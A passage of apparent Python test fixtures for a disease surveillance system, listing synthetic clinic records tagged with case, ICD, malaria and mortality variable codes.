Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_27":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:21', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_28":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:22', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, 'alert': 1, 'alert_reason':'cmd_1', "ale_1": 1, 'cmd_43': 1,'cmd_48': 1, 'epi_1': 1, 'epi_2': 1, 'epi_3': 1, 'epi_4': 1, 'epi_5': 1, 'epi_6': 1, 'epi_7': 1, 'icd_1': 1, 'icd_113': 1, 'icd_168': 1, 'icd_17': 1, 'icd_188': 1, 'icd_2189': 1, 'icd_2194': 1, 'icd_321': 1, 'icd_35': 1, 'icd_380': 1, 'icd_391': 1, 'icd_4177': 1, 'icd_4183': 1, 'icd_421': 1, 'icd_461': 1, 'icd_488': 1, 'icd_530': 1, 'icd_68': 1, 'icd_804': 1, 'icd_91': 1, 'icd_9225': 1, 'icd_9643': 1, 'reg_4': 1, 'mat_0': 1, 'mat_1': 1, 'mat_2': 1, 'mat_3': 1, 'mat_4': 1, 'mat_5': 1, 'mat_6': 1, 'mat_7': 1, 'mat_8': 1, 'mat_9': 1, 'dea_0': 1, 'dea_1': 1, 'dea_2': 1, 'dea_3': 1, 'dea_4': 1, 'dea_5': 1, 'dea_6': 1, 'dea_7': 1, 'dea_8': 1, 'dea_9': 1, 'mor_1':1, 'mor_2':1, 'mor_3':1, 'mor_4':1, 'mor_5':1, 'mor_6':1, 'mor_7':1, 'mor_8':1, 'mor_9':1, 'mor_10':1, 'mor_11':1, 'mor_12':1, 'mor_13':1, 'mor_14':1, 'mor_15':1, 'mor_16':1, 'mor_17':1, 'mor_18':1, 'mor_19':1, 'mor_20':1, 'mor_21':1, 'mor_22':1, 'mor_23':1, 'mor_24':1, 'mor_25':1, 'mor_26':1, 'mor_27':1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:fe301f1b-c541-4dde-a355-1552b03e6b79', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_1":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:101', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_4":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:102', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_5":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:103', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_6":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:104', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_7":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:105', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_8":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:106', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_9":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:107', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_10":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:108', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_11":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:109', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_12":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:110', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_13":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:111', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_15":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:112', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_16":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:113', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_18":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:114', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_19":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:115', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_20":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:116', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_23":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:117', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_24":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:118', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_25":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:119', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_26":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:120', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_27":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:121', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_28":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:122', 'country': 1}),
]
malaria = [
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b1', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b2', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b3', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b4', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b5', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b6', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b7', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b8', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b9', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b10', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b11', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b12', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b13', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b14', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b15', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b16', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b17', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b18', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_10": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b19', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_11": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b20', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_12": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b21', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_13": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b22', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_14": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b23', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_15": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b24', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_16": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b25', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_17": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b26', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_18": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b27', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_19": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b28', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_20": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b29', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_21": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b30', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_22": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b31', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_23": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b32', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_24": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b33', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_25": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b34', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_26": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b35', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_27": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b36', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_28": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b37', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_29": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b38', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_30": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b39', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_31": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b40', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_32": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b41', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_33": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b42', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_34": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b43', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_35": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b44', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_36": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b45', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_37": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b46', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_38": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b47', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_39": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b48', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_40": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b49', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_41": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b50', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_42": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b51', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_43": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b52', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_44": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b53', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_45": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b54', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_46": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b55', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_47": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b56', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_48": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b57', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_49": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b58', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_50": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b59', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_51": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b60', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_52": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b61', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_53": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b62', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_54": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b63', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_55": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b64', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_56": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b65', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_57": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b66', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_58": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b67', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_59": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b68', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_60": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b69', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_61": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b70', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_62": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b71', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_63": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b72', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_64": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b73', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_65": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b74', 'country': 1}),
